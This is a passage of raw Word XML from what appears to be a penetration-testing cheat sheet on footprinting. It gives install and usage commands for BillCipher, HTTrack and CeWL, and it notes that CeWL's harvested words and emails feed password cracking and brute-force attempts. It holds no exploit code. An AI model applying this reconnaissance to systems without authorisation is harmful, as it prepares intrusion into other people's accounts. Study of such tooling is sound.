            <w:r w:rsidRPr="00BF18E6">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF18E6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF18E6">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF18E6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>httrack whatweb</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22C2CD8B" w14:textId="5BF072B3" w:rsidR="00BF18E6" w:rsidRDefault="00BF18E6" w:rsidP="00716493">
            <w:r w:rsidRPr="00BF18E6">
              <w:t>Use the following command to install Bill</w:t>
            </w:r>
            <w:r>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF18E6">
              <w:t>ipher</w:t>
            </w:r>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="662856F8" w14:textId="003ABC2A" w:rsidR="00BF18E6" w:rsidRDefault="00BF18E6" w:rsidP="00716493">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BF18E6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">git </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF18E6">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">clone </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF18E6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>https://github.com/GitHackTools/BillCipher</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61A02504" w14:textId="77777777" w:rsidR="00BF18E6" w:rsidRDefault="00BF18E6" w:rsidP="00716493">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF18E6">
              <w:t>Move into the BillCipher directory</w:t>
            </w:r>
            <w:r>
              <w:t>, then change permission of the script to allow it to be executed</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF18E6">
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BF18E6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cd </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF18E6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>BillCipher</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BF18E6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">chmod </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF18E6">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF18E6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>x billcipher.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A886A38" w14:textId="0357B8E9" w:rsidR="00035CA3" w:rsidRPr="00035CA3" w:rsidRDefault="00035CA3" w:rsidP="00716493">
            <w:r w:rsidRPr="00035CA3">
              <w:t>Now the tool can be simply run (as long as you are in the same directory) using:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28B39921" w14:textId="5E6F49E2" w:rsidR="00035CA3" w:rsidRDefault="00035CA3" w:rsidP="00716493">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00035CA3">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">python3 </w:t>
            </w:r>
            <w:r w:rsidRPr="00035CA3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>billcipher.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B74665" w14:paraId="5719BB7A" w14:textId="77777777" w:rsidTr="00716493">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="088356AD" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00716493"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="31A0DE06" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00716493">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="03726858" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00716493"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03539F9B" w14:textId="23989AF0" w:rsidR="0049571F" w:rsidRDefault="0049571F" w:rsidP="00B74665"/>
    <w:p w14:paraId="307CB5D7" w14:textId="77777777" w:rsidR="0049571F" w:rsidRDefault="0049571F">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="036E6D49" w14:textId="1DDB85DD" w:rsidR="0049571F" w:rsidRDefault="0049571F" w:rsidP="0049571F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Footprinting: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTrack Web Site Copier</w:t>
      </w:r>
      <w:r w:rsidR="002B4809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004902E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidR="002B4809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CeWL</w:t>
      </w:r>
      <w:r w:rsidR="00B268A2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | Favicon Analysis</w:t>
      </w:r>
      <w:r w:rsidR="00536A2C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | sitemap.xml</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1054"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="615"/>
        <w:gridCol w:w="2390"/>
        <w:gridCol w:w="8022"/>
      </w:tblGrid>
      <w:tr w:rsidR="00641256" w14:paraId="74D94EB8" w14:textId="77777777" w:rsidTr="00FC5A3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3E6340BE" w14:textId="333A8E0D" w:rsidR="00641256" w:rsidRDefault="00641256" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>17.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="00B78DD9" w14:textId="05274D2B" w:rsidR="00641256" w:rsidRDefault="00641256" w:rsidP="0049571F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>HTTrack</w:t>
            </w:r>
            <w:r w:rsidR="00C356C8">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00C356C8" w:rsidRPr="00C356C8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Copies a web page to create an offline version)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1CC962A0" w14:textId="0136D6F1" w:rsidR="00641256" w:rsidRPr="000079AE" w:rsidRDefault="00641256" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>HTTrack is an offline browser utility that downloads a website from the Internet to a local directory, builds all directories recursively, and transfers HTML, images, and other files from the webserver to another computer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00641256" w14:paraId="77225B70" w14:textId="77777777" w:rsidTr="00FC5A3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4FADCFD5" w14:textId="63A57956" w:rsidR="00641256" w:rsidRDefault="00641256" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>17.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5A0AFEA9" w14:textId="77777777" w:rsidR="00641256" w:rsidRDefault="00641256" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="72D882E4" w14:textId="4D408CD6" w:rsidR="00641256" w:rsidRPr="009C4612" w:rsidRDefault="00641256" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>To install, simply use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BD7E3D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD7E3D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD7E3D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD7E3D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">apt-get </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD7E3D">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD7E3D">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>httrack webhttrack</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:t>To use the tool in interactive mode, enter:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007E68AB">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>httrack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00641256" w14:paraId="4038ECF6" w14:textId="77777777" w:rsidTr="00FC5A3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7C1AC634" w14:textId="2D112413" w:rsidR="00641256" w:rsidRDefault="00641256" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>17.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2A32B619" w14:textId="78EE2E82" w:rsidR="00641256" w:rsidRDefault="00641256" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7680A4A3" w14:textId="4BAD5A99" w:rsidR="00641256" w:rsidRDefault="00641256" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>To use the tool:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007E68AB">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">httrack </w:t>
            </w:r>
            <w:r w:rsidRPr="00641256">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>www.someweb.com/bob/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> -W</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00641256">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-W</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00641256">
              <w:t>Wizard mode</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00641256">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-g</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00641256">
              <w:t>Just get files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00641256">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-i</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Continue an interrupted sess.</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00641256">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-v</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Verbose mode</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Using HTTrack in interactive mode is easiest as it walk you through each step and ask you questions so you can tailor all the options as necessary.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00434E1A" w14:paraId="003121A3" w14:textId="77777777" w:rsidTr="00FC5A3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="202BC106" w14:textId="26B2A53D" w:rsidR="00434E1A" w:rsidRDefault="00434E1A" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>17.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4998C7E4" w14:textId="51506595" w:rsidR="00434E1A" w:rsidRDefault="00434E1A" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>CeWL</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="002B4809">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Creates a wordlist based on a target website)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00434E1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(CeWL is pronounced "cool")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="05393EF6" w14:textId="3BC0A6A6" w:rsidR="00434E1A" w:rsidRDefault="00434E1A" w:rsidP="00434E1A">
            <w:r w:rsidRPr="002B4809">
              <w:t>The words available on the target website may reveal critical information that can assist in performing further exploitation. CeWL is a ruby app that is used to spider a given target URL to a specified depth, optionally following external links, and returns a list of unique words that can be used for cracking passwords.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">CeWL can also create a list of email addresses found in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mailto</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> links. These email addresses can be used as usernames in brute force actions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00434E1A" w14:paraId="40175845" w14:textId="77777777" w:rsidTr="00FC5A3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4C3CC937" w14:textId="03D9ACAD" w:rsidR="00434E1A" w:rsidRDefault="00434E1A" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>17.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="53003266" w14:textId="77777777" w:rsidR="00434E1A" w:rsidRDefault="00434E1A" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3DFAE0BF" w14:textId="419C7286" w:rsidR="00434E1A" w:rsidRDefault="00434E1A" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>To use CeWl, simply enter:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CB406A" w:rsidRPr="00CB406A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cewl </w:t>
            </w:r>
            <w:r w:rsidR="00CB406A" w:rsidRPr="00CB406A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-w</w:t>
            </w:r>
            <w:r w:rsidR="00CB406A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00CB406A" w:rsidRPr="005F438B">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">OutputTextFile.txt </w:t>
            </w:r>
            <w:r w:rsidR="00CB406A" w:rsidRPr="005F438B">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-d</w:t>
            </w:r>
            <w:r w:rsidR="00CB406A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00CB406A" w:rsidRPr="005F438B">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00CB406A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00CB406A" w:rsidRPr="005F438B">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-m</w:t>
            </w:r>
            <w:r w:rsidR="00CB406A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00CB406A" w:rsidRPr="005F438B">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00CB406A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00557722" w:rsidRPr="00557722">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>www.examplewebsite.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="499A50B7" w14:textId="756149F0" w:rsidR="00557722" w:rsidRDefault="00557722" w:rsidP="00FC5A3D">
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00335E53">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-w</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00335E53">
              <w:t>Save words to a file</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00335E53">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-d</w:t>
            </w:r>
            <w:r w:rsidR="00335E53">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00335E53" w:rsidRPr="00335E53">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00335E53">
              <w:t>Depth to scan</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00335E53">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-m</w:t>
            </w:r>
            <w:r w:rsidR="00335E53">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00335E53">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00335E53">
              <w:t>Minimum word length</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B268A2" w14:paraId="4A9DD452" w14:textId="77777777" w:rsidTr="00FC5A3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
